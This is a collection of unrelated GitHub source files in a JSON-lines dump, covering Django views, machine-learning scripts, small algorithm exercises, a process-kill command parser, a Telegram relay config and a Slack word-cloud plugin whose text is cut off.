AtendimentoDocumento(\r\n atendimento=anotacao_oficio,\r\n data_enviado=datetime.now(),\r\n enviado_por=request.user.servidor)\r\n\r\n form = DocumentoForm(request.POST, request.FILES, instance=documento)\r\n\r\n if form.is_valid():\r\n form.save()\r\n\r\n if hasattr(atendimento.at_inicial, 'arvore'):\r\n atendimento.at_inicial.arvore.ativo = False\r\n atendimento.at_inicial.arvore.save()\r\n\r\n if request.is_ajax():\r\n return JsonResponse({'success': True, 'anotacao': Util.object_to_dict(anotacao_oficio)})\r\n\r\n else:\r\n\r\n msg = 'Erro ao salvar oficio!'\r\n\r\n if request.is_ajax():\r\n return JsonResponse({'success': False, 'message': msg})\r\n else:\r\n messages.error(request, msg)\r\n\r\n if request.POST.get('next'):\r\n return redirect(request.POST['next'])\r\n else:\r\n return redirect('atendimento_atender', atendimento_numero)\r\n\r\n\r\nclass DocumentoAtendimentoGedViewSet(mixins.UpdateModelMixin,\r\n mixins.RetrieveModelMixin,\r\n mixins.ListModelMixin,\r\n DetailSerializerMixin,\r\n GenericViewSet):\r\n\r\n serializer_class = DocumentoAtendimentoSerializer\r\n queryset = DocumentoAtendimento.objects.all()\r\n serializer_detail_class = DocumentoAtendimentoSerializer\r\n permission_classes = [IsAuthenticated]\r\n\r\n def partial_update(self, request, *args, **kwargs):\r\n documento = DocumentoAtendimento.objects.get(id=kwargs['pk'])\r\n documento_ged = documento.documento_online\r\n defensoria = Defensoria.objects.get(id=request.data['defensoria'])\r\n documento_ged.assinaturas.filter(\r\n grupo_assinante=documento_ged.grupo_dono,\r\n ).update(\r\n grupo_assinante_nome=defensoria.nome,\r\n grupo_assinante=defensoria\r\n )\r\n documento_ged.grupo_dono = defensoria\r\n documento_ged.save()\r\n kwargs['partial'] = True\r\n return self.update(request, *args, **kwargs)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_vulnerabilidades(request, atendimento_numero):\r\n vulnerabilidades = {\r\n 'json': {\r\n 'possui_vulnerabilidade': False,\r\n 'vulnerabilidade': []\r\n }\r\n }\r\n if request.is_ajax():\r\n data = request.body\r\n atendimento_id = data.decode(\"utf-8\")\r\n\r\n if settings.SIGLA_UF.upper() == 'AM':\r\n try:\r\n with connection.cursor() as cursor:\r\n cursor.callproc('vul_consultar', [request.user.id, 'SOLAR', atendimento_id])\r\n dados = cursor.fetchone()[0]\r\n vulnerabilidades = simplejson.loads(dados)\r\n except Exception as err:\r\n return JsonResponse({'error': str(err)}, status=500)\r\n else:\r\n lista_vulnerabilidades = TipoVulnerabilidade.objects.ativos().values('id', 'nome', 'descricao')\r\n vulnerabilidades_atendimento = list(\r\n AtendimentoVulnerabilidade.objects.filter(\r\n atendimento=atendimento_id,\r\n ).distinct().values_list('vulnerabilidade_id', flat=True)\r\n )\r\n for v in lista_vulnerabilidades:\r\n v['status'] = True if v['id'] in vulnerabilidades_atendimento else False\r\n v['vulnerabilidade_id'] = v['id']\r\n vulnerabilidades['json']['vulnerabilidade'].append(v)\r\n vulnerabilidades['json']['possui_vulnerabilidade'] = True if len(vulnerabilidades_atendimento) > 0 else False # noqa: E501\r\n\r\n vulnerabilidades['mensagem'] = config.MENSAGEM_VULNERABILIDADE_DIGITAL\r\n return JsonResponse(vulnerabilidades)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef salvar_vulnerabilidades(request, atendimento_numero):\r\n dados_vulnerabilidade = []\r\n response = {}\r\n status = None\r\n\r\n if request.is_ajax():\r\n data = simplejson.loads(request.body)\r\n atendimento_id = data['atendimento_id']\r\n\r\n dados_vulnerabilidade = [\r\n {\r\n 'status': vul['status'],\r\n 'vulnerabilidade_id': vul['vulnerabilidade_id']\r\n } for vul in data['vulnerabilidades']\r\n ]\r\n\r\n if settings.SIGLA_UF.upper() == 'AM':\r\n dados_vulnerabilidade = str(dados_vulnerabilidade).replace(\"'\", '\"')\r\n try:\r\n with connection.cursor() as cursor:\r\n cursor.callproc('vul_salvar', [request.user.id, 'SOLAR', atendimento_id, dados_vulnerabilidade])\r\n data = cursor.cursor.fetchone()[0]\r\n log_db = simplejson.loads(data)\r\n sucesso = log_db['sucesso'].upper() == \"S\"\r\n response = {'error': not sucesso, 'msg': log_db['motivo']}\r\n status = 500 if response['error'] else 200\r\n except Exception as err:\r\n response = {'error': True, 'msg': err}\r\n status = 500\r\n else:\r\n ids_vul_existentes = list(AtendimentoVulnerabilidade.objects.filter(\r\n atendimento_id=atendimento_id).values_list('vulnerabilidade_id', flat=True))\r\n\r\n for vul_atendimento in dados_vulnerabilidade:\r\n # se a vulnerabilidade está marcada e ainda não existir no banco, ela é adicionada\r\n if vul_atendimento['status'] and vul_atendimento['vulnerabilidade_id'] not in ids_vul_existentes:\r\n AtendimentoVulnerabilidade.objects.create(\r\n atendimento_id=atendimento_id,\r\n vulnerabilidade_id=vul_atendimento['vulnerabilidade_id']\r\n )\r\n # se a vulnerabilidade está desmarcada e existe no banco, é removida do banco\r\n elif not vul_atendimento['status'] and vul_atendimento['vulnerabilidade_id'] in ids_vul_existentes:\r\n AtendimentoVulnerabilidade.objects.filter(\r\n atendimento_id=atendimento_id,\r\n vulnerabilidade_id=vul_atendimento['vulnerabilidade_id']\r\n ).delete()\r\n response = {'error': False}\r\n status = 200\r\n return JsonResponse(response, status=status)\r\n\r\n\r\nclass PastaDocumentoViewSet(ModelViewSet):\r\n permission_classes = (permissions.IsAuthenticated,)\r\n queryset = PastaDocumento.objects.all()\r\n serializer_class = PastaDocumentoSerializer\r\n\r\n def perform_create(self, serializer):\r\n \"\"\"\r\n Atualiza o atendimento para inicial caso seja um atendimento de retorno\r\n \"\"\"\r\n atendimento_inicial = serializer.validated_data['atendimento'].inicial\r\n if atendimento_inicial:\r\n serializer.save(atendimento=atendimento_inicial)\r\n else:\r\n serializer.save()\r\n\r\n def get_queryset(self):\r\n queryset = self.queryset\r\n atendimento = self.request.query_params.get('atendimento')\r\n if not atendimento:\r\n return queryset\r\n atendimento = Atendimento.objects.filter(id=int(atendimento)).first()\r\n atendimento_inicial = atendimento.inicial or atendimento\r\n return queryset.filter(atendimento=atendimento_inicial)\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"atendimento/atendimento/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":248850,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35619268449","text":"import pandas as pd\nfrom nltk.corpus import stopwords\nimport re\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\n\nfake_df=pd.read_csv('input/Fake.csv')\ntrue_df=pd.read_csv('input/True.csv')\n\n# fake coded to 1\nfake_df[\"Label\"]=1\ntrue_df[\"Label\"]=0\n\ndf=pd.concat([fake_df,true_df],ignore_index=True)\n\n# create held out final\n# this set will not be used in any section of training or validation\ndf, hold = train_test_split(df, test_size = .1, random_state= 46, shuffle= True)\ndf = df.reset_index(drop = True)\nhold = hold.reset_index(drop = True)\n# write held out to data directory\nhold.to_csv('data/held_out.csv')\n\n# seperate label from features\nX=df.title.copy()\ny=df.Label.copy()\n\nstop_words = stopwords.words('english')\ndef clean(title):\n title = re.sub(\"U.S.|US|U.S|US.\", \"united states\", title)\n title =re.sub(\"[^a-zA-z]\",\" \", title) # removing expressions that are not word\n title=title.lower()\n title = title.split()\n title=\" \".join([word for word in title if not word in stop_words])\n return(title)\n\n\ndf[\"Cleaned\"]= list(map(clean, X))\n\nX=df.Cleaned\n\n# split train and test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=46,shuffle=True)\n\n# define embedings\nmax_lenght=100\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(X_train)\nword_index = tokenizer.word_index # creating word dict for words in training\nsequences = tokenizer.texts_to_sequences(X_train) # replacing words with the number corresponding to them in the dictionary(word_index)\nX_train_padded = pad_sequences(sequences, padding='post',maxlen=max_lenght) # padding words\nX_test_sequences = tokenizer.texts_to_sequences(X_test)\nX_test_padded = pad_sequences(X_test_sequences,padding=\"post\",maxlen=max_lenght)\nvocab_size = len(tokenizer.word_index)+1\nembedding_dim=16\n","repo_name":"gperrett/news-classifier","sub_path":"scripts/rnn_pipeline.py","file_name":"rnn_pipeline.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22465101270","text":"import sys\r\nfrom cx_Freeze import setup, Executable\r\n\r\nbuild_exe_options = {'include_files': ['data'], \"excludes\": [\"tkinter\"]}\r\n\r\n\r\nsetup(\r\n name ='Urban_Champion',\r\n author='rdn',\r\n version = '1.0',\r\n options={'build_exe': build_exe_options},\r\n executables = [Executable('urban_champion.py', base = 'Win32GUI',icon = None)])\r\n\r\n\r\n\r\n\r\n#in command line(cmd) change to current directory(cd) and write: \"setup.py build\" or \"setup.py build_exe\"\r\n","repo_name":"raytomely/Urban-Champion-remake","sub_path":"urban_champion_source/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13660072148","text":"#!/usr/bin/python3\n# Một xâu ký tự số chỉ bao gồm các chữ số 6 và 8 sẽ được gọi là “phát lộc” nếu thỏa mãn các điều kiện sau:\n# Độ dài xâu ít nhất là 6\n# Chữ số đầu tiên là chữ số 8, chữ số cuối cùng là chữ số 6\n# Không có 2 chữ số 8 nào ở cạnh nhau\n# Không có nhiều hơn 3 chữ số 6 ở cạnh nhau.\n# Viết chương trình liệt kê các xâu ký tự phát lộc độ dài N theo thứ tự tăng dần.\n# Input\n# Chỉ có 1 dòng ghi số N (5 < N < 16).\n# Output\n# Ghi ra các xâu ký tự phát lộc độ dài N, mỗi xâu trên một dòng.\n# Ví dụ\n# Input\n# 6\n# Output\n# 866686\n# 866866\n# 868666\n# 868686\n\ndef main():\n ln = int(input())\n if ln < 6:\n return\n def backtrack(cur):\n if len(cur) == ln:\n print(cur)\n return\n choices = ['6','8']\n if len(cur) == 0 or (len(cur) >= 3 and cur[-3:] == '666'):\n choices = ['8']\n elif len(cur) == ln-1 or cur[-1] == '8':\n choices = ['6']\n for i in choices:\n backtrack(cur + i)\n backtrack(\"\")\nmain()","repo_name":"ptit-mo/code","sub_path":"dsa/DSA01026_phat_loc.py","file_name":"DSA01026_phat_loc.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9147938852","text":"# Standard scientific Python imports\nimport time\nimport datetime as dt\n\n# Import datasets, classifiers and performance metrics\nimport scipy\nfrom sklearn import datasets, svm, metrics\n# fetch original mnist dataset\nfrom sklearn.datasets import fetch_mldata\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\n# Standard scientific Python imports\nfrom matplotlib.colors import Normalize\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport datetime as dt\nimport csv\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n\n\ndef main():\n # pick random indexes from 0 to size of our dataset\n\n # ---------------- classification begins -----------------\n # scale data for [0,255] -> [0,1]\n # sample smaller size for testing\n # rand_idx = np.random.choice(images.shape[0],10000)\n # X_data =images[rand_idx]/255.0\n # Y = targets[rand_idx]\n\n # full dataset classification\n # split data to train and test\n # from sklearn.cross_validation import train_test_split\n server_address = (\"\", 8000)\n httpd = HTTPServer(server_address, CGIHTTPRequestHandler)\n httpd.serve_forever()\n\n all_variables = scipy.io.loadmat('data_MNIST.mat')\n X_test = np.array(all_variables['Xtest'])\n X_train = np.array(all_variables['Xtrain'])\n y_test = np.array(all_variables['ytest'])\n y_train = np.array(all_variables['ytrain'])\n show_some_digits(X_test, y_test)\n\n ############### Classification with grid search ##############\n # If you don't want to wait, comment this section and uncommnet section below with\n # standalone SVM classifier\n\n # Warning! It takes really long time to compute this about 2 days\n\n # Create parameters grid for RBF kernel, we have to set C and gamma\n\n # generate matrix with all gammas\n # [ [10^-4, 2*10^-4, 5*10^-4],\n # [10^-3, 2*10^-3, 5*10^-3],\n # ......\n # [10^3, 2*10^3, 5*10^3] ]\n # gamma_range = np.outer(np.logspace(-4, 3, 8),np.array([1,2, 5]))\n\n gamma_range = np.outer(np.logspace(-3, 0, 4), np.array([1, 5]))\n gamma_range = gamma_range.flatten()\n\n # generate matrix with all C\n C_range = np.outer(np.logspace(-1, 1, 3), np.array([1, 5]))\n # flatten matrix, change to 1D numpy array\n C_range = C_range.flatten()\n\n parameters = {'kernel': ['rbf'], 'C': C_range, 'gamma': gamma_range}\n\n svm_clsf = svm.SVC()\n grid_clsf = GridSearchCV(estimator=svm_clsf, param_grid=parameters, n_jobs=1, verbose=2)\n\n print('Время начала поиска параметров {}'.format(str(dt.datetime.now())))\n\n grid_clsf.fit(X_train, y_train)\n\n print('Время окончания поиска параметров {}'.format(str(dt.datetime.now())))\n sorted(grid_clsf.cv_results_.keys())\n\n classifier = grid_clsf.best_estimator_\n params = grid_clsf.best_params_\n\n scores = grid_clsf.cv_results_['mean_test_score'].reshape(len(C_range),\n len(gamma_range))\n print(scores)\n plot_param_space_scores(scores, C_range, gamma_range)\n plot_param_space_scores_1(scores, C_range, gamma_range)\n\n for x in range(6):\n for y in range(8):\n print(\"c:\", C_range[x], \", gamma:\", gamma_range[y], \", score:\", scores[x][y])\n\n ######################### end grid section #############\n\n # Now predict the value of the test\n expected = y_test\n print('Время начала классификации 10000 символов {}'.format(str(dt.datetime.now())))\n predicted = classifier.predict(X_test)\n print('Время окончанияа классификации 10000 символов {}'.format(str(dt.datetime.now())))\n\n show_some_digits(X_test, predicted, title_text=\"Predicted {}\")\n\n print(\"Отчет для классификатора %s:\\n%s\\n\"\n % (classifier, metrics.classification_report(expected, predicted)))\n\n cm = metrics.confusion_matrix(expected, predicted)\n print(\"Матрица совпадений:\\n%s\" % cm)\n\n plot_confusion_matrix(cm)\n\n print(\"Точность={}\".format(metrics.accuracy_score(expected, predicted)))\n\n plt.show()\n\n\ndef show_some_digits(images, targets, sample_size=24, title_text='Digit {}'):\n '''\n Visualize random digits in a grid plot\n images - array of flatten gidigs [:,784]\n targets - final labels\n '''\n nsamples = sample_size\n rand_idx = np.random.choice(images.shape[0], nsamples)\n images_and_labels = list(zip(images[rand_idx], targets[rand_idx]))\n\n img = plt.figure(1, figsize=(15, 12), dpi=160)\n for index, (image, label) in enumerate(images_and_labels):\n plt.subplot(np.ceil(nsamples / 6.0), 6, index + 1)\n plt.axis('off')\n # each image is flat, we have to reshape to 2D array 28x28-784\n plt.imshow(image.reshape(28, 28), cmap=plt.cm.gray_r, interpolation='nearest')\n plt.title(title_text.format(label))\n\n\ndef plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Blues):\n \"\"\"\n Plots confusion matrix,\n\n cm - confusion matrix\n \"\"\"\n plt.figure(1, figsize=(15, 12), dpi=160)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n plt.tight_layout()\n plt.ylabel('Исходные данные')\n plt.xlabel('Предсказанные данные')\n\n\nclass MidpointNormalize(Normalize):\n\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return np.ma.masked_array(np.interp(value, x, y))\n\n\ndef plot_param_space_scores(scores, C_range, gamma_range):\n #\n # The score are encoded as colors with the hot colormap which varies from dark\n # red to bright yellow. As the most interesting scores are all located in the\n # 0.92 to 0.97 range we use a custom normalizer to set the mid-point to 0.92 so\n # as to make it easier to visualize the small variations of score values in the\n # interesting range while not brutally collapsing all the low score values to\n # the same color.\n\n # plt.figure(figsize=(8, 6))\n plt.figure(figsize=(2, 2))\n plt.subplots_adjust(left=.2, right=0.95, bottom=0.15, top=0.95)\n plt.imshow(scores, interpolation='nearest', cmap=plt.cm.jet)\n plt.xlabel('gamma')\n plt.ylabel('C')\n plt.colorbar()\n plt.xticks(np.arange(len(gamma_range)), gamma_range)\n plt.yticks(np.arange(len(C_range)), C_range)\n plt.title('Точность классификации')\n\n\ndef plot_param_space_scores_1(scores, C_range, gamma_range):\n data_names = gamma_range\n data_values = scores * 100\n\n dpi = 80\n fig = plt.figure(dpi=dpi, figsize=(1200 / dpi, 600 / dpi))\n mpl.rcParams.update({'font.size': 12})\n\n plt.title('Точность классификации в зависимости от параметров C и gamma')\n\n ax = plt.axes()\n ax.yaxis.grid(True, zorder=1)\n\n print(data_names)\n xs = range(len(data_names))\n print(xs)\n\n plt.bar([x - 0.38 for x in xs], data_values[0],\n width=0.15, color='darkgreen', label='C = %(C_range)1.1f' % {\"C_range\": C_range[0]},\n zorder=10)\n plt.bar([x - 0.23 for x in xs], data_values[1],\n width=0.15, color='green', label='C = %(C_range)1.1f' % {\"C_range\": C_range[1]},\n zorder=2)\n plt.bar([x - 0.08 for x in xs], data_values[2],\n width=0.15, color='limegreen', label='C = %(C_range)1.0f' % {\"C_range\": C_range[2]},\n zorder=2)\n\n plt.bar([x + 0.07 for x in xs], data_values[3],\n width=0.15, color='lime', label='C = %(C_range)1.0f' % {\"C_range\": C_range[3]},\n zorder=2)\n plt.bar([x + 0.22 for x in xs], data_values[4],\n width=0.15, color='greenyellow', label='C = %(C_range)1.0f' % {\"C_range\": C_range[4]},\n zorder=2)\n plt.bar([x + 0.37 for x in xs], data_values[5],\n width=0.15, color='yellow', label='C = %(C_range)1.0f' % {\"C_range\": C_range[5]},\n zorder=2)\n plt.xticks(xs, data_names)\n plt.xlabel('Значение параметра gamma')\n plt.ylabel('Точность, %')\n\n # fig.autofmt_xdate(rotation = 25)\n\n plt.legend(loc='upper right')\n fig.savefig('bars.png')\n\n\nif __name__ == \"__main__\": # If run as a script, create a test object\n main()\n","repo_name":"darya-lap/svm_mnist_classification","sub_path":"svm_mnist_digit_classification-master/svm_RBF_classifier.py","file_name":"svm_RBF_classifier.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8255248960","text":"# Preorder transverse tree\n\nclass Tree():\n def __init__(self, value, left = None, right = None):\n self.root = value\n self.left = left\n self.right = right\n\n\ndef preorder(tree):\n if tree == None:\n return\n print(tree.root)\n preorder(tree.left)\n preorder(tree.right)\n\ndef store(tree, list):\n if tree == None:\n list.append(None)\n else:\n list.append(tree.root)\n store(tree.left, list)\n store(tree.right, list)\n return list\n\n\n\nmytree = Tree(4)\nmytree.left = Tree(1)\nmytree.right=Tree(5)\nmytree.left.left = Tree(3)\nmytree.left.right = Tree(2)\n\npreorder(mytree)\nprint('-------------')\n\nprint(store(mytree, []))\n","repo_name":"smallfishxz/Practice_Algorithm","sub_path":"brownbag/Deserilize_BTree.py","file_name":"Deserilize_BTree.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31596198669","text":"# Project Euler Prob 66\n\"\"\"\n Consider quadratic Diophantine equations of the form:\n\n x^2 - Dy^2 = 1\n Find the value of D ≤ 1000 in minimal solutions of x for which \n the largest value of x is obtained.\n\n\"\"\"\ndef isprime(num):\n for n in range(2,int(num**1/2)+1):\n if num % n == 0:\n return False\n return True\n\ndef topower5(num):\n x = str(num)\n l = len(x)\n y = 0\n for i in range(0, l):\n xi = int(x[i])\n y = xi**5 + y\n if y == num:\n #print(num)\n return True\nxmax = 0\nfor D in range(1, 1000):\n for x in range(1, 1000):\n for y in range(1, 1000):\n E = x**2 - (D*y**2)\n if E == 1:\n if x > xmax:\n xmax = x\n #print(\"x=\",x,\"y=\",y, \"is a solution for D=\", D)\nprint(xmax)\n","repo_name":"makbar1/python","sub_path":"Python Project 1/prob66.py","file_name":"prob66.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40341329550","text":"# -*- coding: utf-8 -*-\n\"\"\"\nKillall command module.\n\"\"\"\n\n__author__ = 'Yeshu Yang'\n__copyright__ = 'Copyright (C) 2018, Nokia'\n__email__ = 'yeshu.yang@nokia.com'\n\nimport re\n\nfrom moler.cmd.unix.genericunix import GenericUnixCommand\nfrom moler.exceptions import CommandFailure\nfrom moler.exceptions import ParsingDone\n\n\nclass Killall(GenericUnixCommand):\n\n def __init__(self, connection, name, is_verbose=False, prompt=None, newline_chars=None, runner=None):\n super(Killall, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,\n runner=runner)\n self.is_verbose = is_verbose\n self.name = name\n self.ret_required = False\n\n def build_command_string(self):\n if self.is_verbose:\n cmd = \"{} {} {}\".format(\"killall\", \"-v\", self.name)\n else:\n cmd = \"{} {}\".format(\"killall\", self.name)\n return cmd\n\n def on_new_line(self, line, is_full_line):\n if is_full_line:\n try:\n self._parse_no_permit(line)\n self._parse_killall_verbose(line)\n except ParsingDone:\n pass\n return super(Killall, self).on_new_line(line, is_full_line)\n\n def _parse_no_permit(self, line):\n if self._regex_helper.search(r'(Operation not permitted)', line):\n self.set_exception(CommandFailure(self, \"ERROR: {}\".format(self._regex_helper.group(1))))\n raise ParsingDone\n\n _re_killall = re.compile(r\"Killed (?P[^\\(]+)\\((?P\\d+)\\) with signal\")\n\n def _parse_killall_verbose(self, line):\n if self.is_verbose:\n if self._regex_helper.search_compiled(Killall._re_killall, line):\n if \"Detail\" not in self.current_ret:\n self.current_ret[\"Detail\"] = dict()\n pid = self._regex_helper.group(\"Pid\")\n self.current_ret[\"Detail\"][pid] = self._regex_helper.group(\"Name\")\n raise ParsingDone\n\n\nCOMMAND_OUTPUT_no_verbose = \"\"\"\nPclinux90:~ # killall iperf\nPclinux90:~ # \"\"\"\n\nCOMMAND_KWARGS_no_verbose = {\"name\": \"iperf\"}\n\nCOMMAND_RESULT_no_verbose = {\n\n}\n\nCOMMAND_OUTPUT_no_process = \"\"\"\nPClinux110:/home/runner # killall tshark\ntshark: no process found\nPClinux110:/home/runner #\"\"\"\n\nCOMMAND_KWARGS_no_process = {\"name\": \"tshark\"}\n\nCOMMAND_RESULT_no_process = {\n\n}\n\nCOMMAND_OUTPUT_verbose = \"\"\"\nPclinux90:~ # killall -v iperf\nKilled iperf(15054) with signal 15\nPclinux90:~ # \"\"\"\n\nCOMMAND_KWARGS_verbose = {\n \"name\": \"iperf\",\n \"is_verbose\": True\n}\n\nCOMMAND_RESULT_verbose = {\n \"Detail\": {\"15054\": \"iperf\"}\n}\n","repo_name":"nokia/moler","sub_path":"moler/cmd/unix/killall.py","file_name":"killall.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"36939751861","text":"'''\nCreated on 08.03.2020\n\n@author: 49157\n'''\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime as dt\nimport numpy as np\nimport pylab as pl\n\nlogdir = os.path.join(os.getcwd(),'sim_results')\nfilepath_log = os.path.join(logdir,'log_complete.csv')\nfilepath_forecast = os.path.join(logdir,'kpi_forecast_complete.csv')\nfilepath_control = os.path.join(logdir,'kpi_control_complete.csv')\n\ndf_log = pd.read_csv(filepath_log, sep=';', decimal=',', index_col='time')\ndf_log.index = pd.to_datetime(df_log.index)\n\ndf_c = pd.read_csv(filepath_control, sep=';', decimal='.', index_col = 'start')\ndf_c.index = pd.to_datetime(df_c.index)\n\ndf_f = pd.read_csv(filepath_forecast, sep=';', decimal='.', index_col = 'time')\ndf_f.index = pd.to_datetime(df_f.index)\n\n\n''' ---------- forecast evaluation - boxplots ----------'''\n\nfig = pl.figure()\nax = pl.axes()\nfor i in range(10):\n month = df_f.loc[dt.datetime(2018,2+i,1):dt.datetime(2018,3+i,1)]\n pl.boxplot(month['2h_median'].get_values(), positions = [i+1], showfliers = False)\n\nmonth = df_f.loc[dt.datetime(2018,12,1):dt.datetime(2018,12,31)]\npl.boxplot(month['2h_median'].get_values(), positions = [11], showfliers = False)\n \nax.set_xticklabels(['Feb', 'Mar', 'Apr', 'Mai','Jun','Jul','Aug','Sep','Oct','Nov','Dez'])\npl.grid()\npl.ylim([-.7,.7])\npl.title('forecast-KPI during the next two hours') \n\n\nfig = pl.figure()\nax = pl.axes()\nfor i in range(10):\n month = df_f.loc[dt.datetime(2018,2+i,1):dt.datetime(2018,3+i,1)]\n pl.boxplot(month['24h_median'].get_values(), positions = [i+1], showfliers = False)\n\nmonth = df_f.loc[dt.datetime(2018,12,1):dt.datetime(2018,12,31)]\npl.boxplot(month['24h_median'].get_values(), positions = [11], showfliers = False)\n \nax.set_xticklabels(['Feb', 'Mar', 'Apr', 'Mai','Jun','Jul','Aug','Sep','Oct','Nov','Dez'])\npl.grid()\npl.ylim([-.7,.7])\npl.title('forecast-KPI during the next 24 hours')\n\n\n\n''' ---------- control evaluation ----------'''\nplt.figure(3)\nplt.title('evaluation - control')\ncsv_mean = df_log.groupby(df_log.index.time).mean()\nplt.plot(csv_mean['IO'], label = 'IO results')\nplt.grid()\n\nprint(' ----- controlling results ----- \\n')\nprint('Cost forecast control: {}'.format(sum(df_c['kpi forecast'])))\nprint('Cost two-point control: {}'.format(sum(df_c['kpi standard'])))\n\nc = df_log['IO'].get_values()\nBI = (df_log['bi'].get_values()+1)/2\n\ne = 0\nfor i in range(len(BI)):\n e = e +((1-BI[i])*10 +20)*c[i]\nprint('\\n Total costs [Euro]= ',e*0.00833/100,'Euro')\n\n\n\n# Praediktionsfehler nach Tageszeit\n# plt.figure(4)\n# forecast_mean = df_f.groupby(df_f.index.time).mean()\n# plt.plot(forecast_mean['2h_median'])\n# plt.plot(forecast_mean['6h_median'])\n# plt.plot(forecast_mean['12h_median'])\n# plt.plot(forecast_mean['24h_median'])\n\n\nplt.show()","repo_name":"stfriedr/evaluation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22654116738","text":"print(\"Введите число3 возводимое в степень, и степень числа\")\na = float(input())\nn = int(input())\nresult = 1.0\n\nfor i in range(abs(n)):\n result *= a\n\nif n < 0:\n result = 1 / result\n\nprint(result)\n","repo_name":"Gogapain/Programming","sub_path":"Practice/11/Phyton/1111.py","file_name":"1111.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9312991799","text":"#CONFIGURAÇÕES_DE_CONEXÃO_TELEGRAM\napi_id = \"\"\napi_hash = \"\"\nsessao = \"Enviar Mensagem\" #NÃO MEXER\n\n#CONFIGURAÇÕES AFILIADO\nlink_afiliado = \"\"\n\n#ID_DOS_GRUPOS_ORIGEM (NÃO MEXER)\nMINES_ID_ORIGEM = -1001939194214\nSPACEMAN_ID_ORIGEM = -1001681284432\nFORTUNE_TIGER_ID_ORIGEM = -1001925549581\nPENALTY_SHOOT_UP_ID_ORIGEM = -1001938509759\nAVIATOR_ID_ORIGEM = -1001592219591\nBAC_BO_ID_ORIGEM = -1001931780675\n\n#ID_DOS_GRUPOS_DESTINO (MEXER)\nMINES_ID_DESTINO = -000\nSPACEMAN_ID_DESTINO = -000\nFORTUNE_TIGER_ID_DESTINO = -000\nPENALTY_SHOOT_UP_ID_DESTINO = -000\nAVIATOR_ID_DESTINO = -000\nBAC_BO_ID_DESTINO = -0000\n\n#PREFERENCIAS_DOS_GRUPOS (True = LIGADO, False = DESLIGADO)\nMINES_PREFERENCE = False\nSPACEMAN_PREFERENCE = False\nFORTUNE_TIGER_PREFERENCE = False\nPENALTY_SHOOT_UP_PREFERENCE = False\nAVIATOR_PREFERENCE = False","repo_name":"WillDevAC/sim-replicador","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36627485834","text":"import re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport config\nfrom PIL import Image\nfrom wordcloud import STOPWORDS, ImageColorGenerator, WordCloud\nfrom slackclient import SlackClient\n\nstopWords = config.stopWords\n\nclass wordCloudPlugin:\n\n def __init__(self):\n self.keywords = [\"!cloud\", \"!wordcloud\"]\n self.client = SlackClient(config.admin_token)\n\n def execute(self, event):\n\n channel = event.get('channel')\n rawMessages = self.client.api_call(\"channels.history\", channel=channel)\n \n if not rawMessages[\"ok\"]:\n self.client.api_call(\"chat.postMessage\", thread_ts=event['ts'], channel=channel, text=\"Error forming the word cloud :(\")\n return\n\n text = \"\"\n for messageObj in rawMessages[\"messages\"]:\n text += \" \" + messageObj[\"text\"].strip()\n\n while rawMessages[\"has_more\"]:\n rawMessages = self.client.api_call(\"channels.history\", channel=channel, \n count=1000, latest=rawMessages[\"messages\"][-1][\"ts\"])\n for messageObj in rawMessages[\"messages\"]:\n text += \" \" + messageObj[\"text\"].strip()\n\n text = text.lower()\n text = \" \".join([word for word in text.split() if word not in stopWords])\n text = re.sub(r\"\\s+\", ' ', text)\n text = re.sub('<[^>]+>', '', text)\n text = re.sub(r\"[^a-z .]\", '', text) #remove all characters that aren't letters, spaces, or periods\n \n if text:\n\n wordcloud = WordCloud(width=1600, height=800).generate(text)\n filepath = 'plugins/wordClouds/word_cloud_' + channel + '.png'\n\n plt.figure( 